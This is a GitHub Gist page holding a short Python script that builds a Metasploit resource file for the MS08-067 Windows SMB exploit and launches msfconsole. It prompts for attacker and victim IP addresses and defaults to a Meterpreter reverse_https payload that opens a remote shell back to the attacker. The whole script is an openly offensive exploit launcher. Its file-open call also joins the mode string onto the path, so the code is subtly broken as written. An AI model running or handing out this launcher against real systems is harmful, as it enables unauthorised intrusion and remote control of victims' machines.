Last active
November 16, 2016 22:04
-
-
Save richardsonlima/e21b298aa703d52a7c6881a9dcb99984 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf-8 | |
# | |
# | |
# This has been redesigned to use the MS08-067 in Metasploit which is much more reliable. | |
# | |
# | |
# | |
import subprocess | |
# Py2/3 compatibility | |
# Python3 renamed raw_input to input | |
try: | |
input = raw_input | |
except NameError: | |
pass | |
def create_rc(revhost, victim, payload, port): | |
with open("/root/.set/ms08-067.rc" + "w") as filewrite: | |
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n" | |
"set payload {0}\n" | |
"set RHOST {1}\n" | |
"set LPORT {2}\n" | |
"set LHOST {3}\n" | |
"exploit\n\n".format(payload, victim, port, revhost)) | |
def launch_msf(): | |
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait() | |
revhost = input("Enter your LHOST (attacker IP address) for the reverse listener: ") | |
revport = input("Enter your LPORT (attacker port) for the reverse listener: ") | |
victim = input("Enter the RHOST (victim IP) for MS08-067: ") | |
payload = input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ") | |
if not payload: | |
payload = "windows/meterpreter/reverse_https" | |
# create the rc file | |
create_rc(revhost, victim, payload, revport) | |
# launch msf | |
launch_msf() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment